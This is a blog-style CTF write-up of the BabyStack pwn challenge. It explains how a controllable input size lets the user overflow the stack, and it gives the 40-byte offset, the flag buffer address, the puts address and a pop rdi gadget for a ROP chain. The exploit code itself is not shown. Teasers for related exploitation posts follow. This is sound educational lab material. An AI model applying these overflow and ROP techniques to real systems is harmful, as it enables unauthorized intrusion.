Skip to main content

CTF PWN Write up greek ECSC CTF quals 2019: Babystack (ง'̀-'́)ง (day 82)

 

Its been a while since my last update in this blog, I finally have some time to make another write up of pwn CTF challenge.

Thanks to my classmate Christos for sharing this challenge, I hope this blog can help you to understand how to approach this challenge.

The challenge was named BabyStack. It was a 64 bit ELF executable and it's expected us to change the flow of program execution in order to spit out the flag



At first, if you try to run the app it will show read() open error function this indicates that this binary needs to have some additional file in order to run properly.



Since this is a CTF challenge I just try to create like a dummy file called flag to see if this the correct file to be prepared.



It turns out it was a correct file and we can see that the binary give us two input first is the "size" and the "data"



next, let's try to load the binary to ghidra so we have more detail information about the binary. Examining the pseudocode we could determine that the program use "size" to determine how big is the size of the input "data"

this is certainly a good sign for an attacker since we can control how big is the space of our input we can overflow the stack of the program to gain control of the execution flow

But notice before the program give us two previous prompts it called function init(). let's have a quick look at what is happening inside the function init()




I think it is pretty straightforward, this function was used to get the content of the "flag" file that we just created and if the file does not exist it will show an error that we just saw at the first time we run the program

let's load the program in gdb-peda to debug the program and see if we got anything interesting







as you can see I try to allocate 100 bytes in the memory and insert a long string pattern to see if it caused any segmentation fault.



If we take a look at the crashed register in order to overwrite the RIP register we need to supply 40 bytes of data

The next question will be how do we able to obtain the flag inside the program?

still, remember the init() function that loads the flag file?

practically any program that loads a file and retrieves the content will be stored in the memory of the program. We can check this by putting a breakpoint at open() function and read() function in init() function




run the program and try to take a look at the argument passing in each of the functions


at the first breakpoint we can see that it passed the "./flag" string file to the open function



next at the second breakpoint, we can see that the loaded file "flag" content will be stored at 0x6010c0



we can check this location manually using this command:



so we know the location of the "flag" content knows its time to create the exploit.

we need to construct a ROP gadget since NX protection is on and we want to chain it with puts() function located in 0x400700



also, we need to have the required gadget to load the parameter to the puts() function we can use ROPgadget tools



from the result, we got a suitable gadget which is pop rdi; ret. remember rdi register is considered as the first parameter.





from all of this information, we can create the following exploit like the above and once we run it we got the flag :)

That's all guys I hope you enjoy this blog and if there is something that I missed leave a comment below


Labels:

Comments

Post a Comment

Popular posts from this blog

Having fun analyzing nginx log to find malicious attacker in the net (ง'̀-'́)ง (day 37)

  What makes you sleepless at night? is it because of a ghost or scary stories? is it because you have an important meeting tomorrow? or is it because you have an exam? For me, what keeps me up all night is that I keep thinking about what happens to a website that I just created, is it safe from an attacker (certainly not) or did I missing some security adjustments that lead to vulnerability? well I'm not the best secure programmer in the world, I'm still learning and there is a big possibility that I can make a mistake but for me, a mistake can be a valuable investment to myself or yourself to be better so from this idea, I want to know more about what attackers casually do when attacking a website. Here in this post, I'm going to show you how I analyzed attack to the website that I have permission to design and also some interesting findings that I could get from the analysis Background: All of this analysis comes from the traffic that is targeted to th
Post a Comment
Read More »

Utilize Pwntools for crafting ROP chain :') (day 69)

who doesn't like pwntools? it is a very versatile tool and can be customized according to our need using the python script but did you need to know that pwntools itself can help us to automatically craft a rop chain for us? so in this post, I will show you how to make rop chain less painful and make pwntools do all the heavy lifting. To demonstrate this I will use the binary challenge callme 64 bit from ropemporium link: https://ropemporium.com/challenge/callme.html Crashing the app: Like any other exploitation process, we need to crash the program by generating a long string pattern to determine the offset. based on the information from the above figure we can see that we required to provide 40 bytes of offset Fun stuff: now this where the fun stuff began write the following python script: as in the guideline of the challenged said we need to chain the function call by first to call the callme_one function, callme_two function and then callme_three funct
Post a Comment
Read More »

WriteUp PWN tarzan ROP UNICTF ಠ_ಠ (day 61)

So in this post, I'm going to talk about how to solve the Tarzan pwn challenge from UNICTF 2019. Back in the day when the competition is still going I couldn't finish it and don't have any clue to solve this but this time I was able to finish it :) Also in this post, we will be going to be heavily focused on how to utilize pwntools to construct a ROP chain. If you kinda confused about my explanation in this post you can refer to this following youtube video, link: https://www.youtube.com/watch?v=gWU2yOu0COk I build the python script based on this video Ok, let's get started! In this challenge, you will get two binary first go with tarzan and libc-2.29.so by providing .so file it tell us what version library that the target machine is using this could help us to do ROP chain. first, we run the Tarzan binary to get the basic idea of the program work and as you can see it just show you some text, newline and when you try to input something it doesn't gi
Post a Comment
Read More »